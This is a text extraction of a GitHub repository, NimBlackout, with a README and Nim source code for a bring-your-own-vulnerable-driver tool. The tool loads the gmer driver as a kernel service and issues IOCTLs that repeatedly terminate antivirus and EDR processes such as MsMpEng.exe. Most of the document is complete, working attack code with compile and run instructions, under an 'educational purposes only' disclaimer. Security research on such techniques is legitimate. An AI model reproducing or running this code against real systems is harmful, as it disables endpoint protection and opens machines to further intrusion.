Repository: Helixo32/NimBlackout
Branch: main
Commit: 3777723e9b0e
Files: 3
Total size: 5.4 KB
Directory structure:
gitextract_1osb6zj2/
├── README.md
└── src/
├── Blackout.sys
└── NimBlackout.nim
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# NimBlackout
[](https://nim-lang.org/)
> **Note**: This project is for educational purposes only. The use of this code for any malicious activity is strictly prohibited. I am not responsible for any misuse of this software.
NimBlackout is an adaptation of the [@Blackout](https://github.com/ZeroMemoryEx/Blackout) project originally developed in C++ by [@ZeroMemoryEx](https://github.com/ZeroMemoryEx), which consists of removing AV/EDRs using the gmer (BYOVD) driver.
The main reason for this project was to understand how BYOVD attacks work, and then to provide a valid PoC developed in Nim.
All credit must goes to the original author [@ZeroMemoryEx](https://github.com/ZeroMemoryEx).
# Usage
- Compilation
- Linux
```
nim --os:windows --cpu:amd64 --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc c NimBlackout.nim
```
- Windows
```
nim c NimBlackout.nim
```
- Put Blackout.sys driver into current directory
- Launch NimBlackout (with admin privileges)
```
NimBlackout.exe <process name>
```
In order to prevent restarting process (like MsMpEng.exe), keep the program running.
# Demo
================================================
FILE: src/NimBlackout.nim
================================================
import winim
import strformat
import strutils
import os
import parseopt
const INITIALIZE_IOCTL_CODE = 0x9876C004
const TERMINATE_PROCESS_IOCTL_CODE = 0x9876C094
# Overload $ proc to allow string conversion of szExeFile
proc `$`(a: array[MAX_PATH, WCHAR]): string = $cast[WideCString](unsafeAddr a[0])
proc GetPID(process_name: string): DWORD =
var
pid: DWORD = 0
entry: PROCESSENTRY32
hSnapshot: HANDLE
entry.dwSize = cast[DWORD](sizeof(PROCESSENTRY32))
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
defer: CloseHandle(hSnapshot)
if Process32First(hSnapshot, addr entry):
while Process32Next(hSnapshot, addr entry):
if $entry.szExeFile == process_name:
pid = entry.th32ProcessID
break
return pid
proc LoadDriver(driver_path: cstring): bool=
var
hSCM: SC_HANDLE
hService: SC_HANDLE
service_name: string = "NimBlackout"
# Open a handle to the SCM database
hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)
if hSCM == 0:
echo "[-] OpenSCManager failed {GetLastError()}"
return false
hService = CreateServiceA(
hSCM,
service_name,
service_name,
SERVICE_START or DELETE or SERVICE_STOP,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
&driver_path,
NULL,
NULL,
NULL,
NULL,
NULL
)
if hService == 0:
if GetLastError() == 1073:
StartServiceA(hService, 0, NULL)
echo "[+] Service started"
return true
else:
echo fmt"[-] CreateService failed: {GetLastError()}"
return false
StartServiceA(hService, 0, NULL)
echo "[+] Service started"
CloseServiceHandle(hService)
CloseServiceHandle(hSCM)
return true
proc NimBlackout(process_name: string, driver_path: cstring): void=
var
hDevice: HANDLE
target_pid: DWORD
bytes_returned: DWORD
output: DWORD
outputSize: DWORD = cast[DWORD](sizeof(output))
result: bool
if LoadDriver(driver_path):
echo "[+] Driver loaded successfully !"
else:
echo "[-] Failed to load driver, try to run as administrator !"
return
hDevice = CreateFileA("\\\\.\\NimBlackout", GENERIC_READ or GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0)
if hDevice == INVALID_HANDLE_VALUE:
echo fmt"[-] Failed to open handle to driver, error code: {GetLastError()}"
return
echo "[+] Handle to driver open !"
target_pid = GetPID(process_name)
if target_pid == 0:
echo fmt"[-] {process_name} not found !"
quit(1)
echo fmt"[+] PID of {process_name}: {target_pid}"
result = DeviceIoControl(hDevice, cast[DWORD](INITIALIZE_IOCTL_CODE), &target_pid, 64, &output, outputSize, &bytes_returned, NULL)
if result == false:
echo "[-] Driver failed to initialize"
echo "[*] Windows error code: " & $GetLastError()
quit(1)
echo "[+] Driver initialized !"
while true:
target_pid = GetPID(process_name)
if target_pid == 0:
continue
result = DeviceIoControl(hDevice, cast[DWORD](TERMINATE_PROCESS_IOCTL_CODE), &target_pid, cast[DWORD](sizeof(target_pid)), &output, outputSize, &bytes_returned, NULL)
if result == false:
echo "[-] Process failed to terminate"
echo "[*] Windows error code: " & $GetLastError()
continue
echo "[+] Process has been terminated !\n\\_ [*] Keep running if you want avoid restarting"
when isMainModule:
var args: seq[string] = commandLineParams()
var par = initOptParser(args)
var process: seq[string]
for kind, key, val in args.getopt():
case kind
of cmdLongOption, cmdShortOption:
discard
of cmdArgument:
process.add key
of cmdEnd: assert(false)
var driver_path = getCurrentDir() & r"\Blackout.sys"
try:
var process_target = process[0]
NimBlackout(process_target, driver_path)
except:
echo "\n[*] Usage: NimBlackout.exe <process to kill>\n"
gitextract_1osb6zj2/
├── README.md
└── src/
├── Blackout.sys
└── NimBlackout.nim
Condensed preview — 3 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (6K chars).
[
{
"path": "README.md",
"chars": 1300,
"preview": "# NimBlackout\n\n[](https://nim-lang.org/)\n\n> **Note**: T"
},
{
"path": "src/NimBlackout.nim",
"chars": 4276,
"preview": "import winim\nimport strformat\nimport strutils\nimport os\nimport parseopt\n\n\nconst INITIALIZE_IOCTL_CODE = 0x9876C004\nconst"
}
]
// ... and 1 more files (download for full content)
About this extraction
This page contains the full source code of the Helixo32/NimBlackout GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 3 files (5.4 KB), approximately 1.5k tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.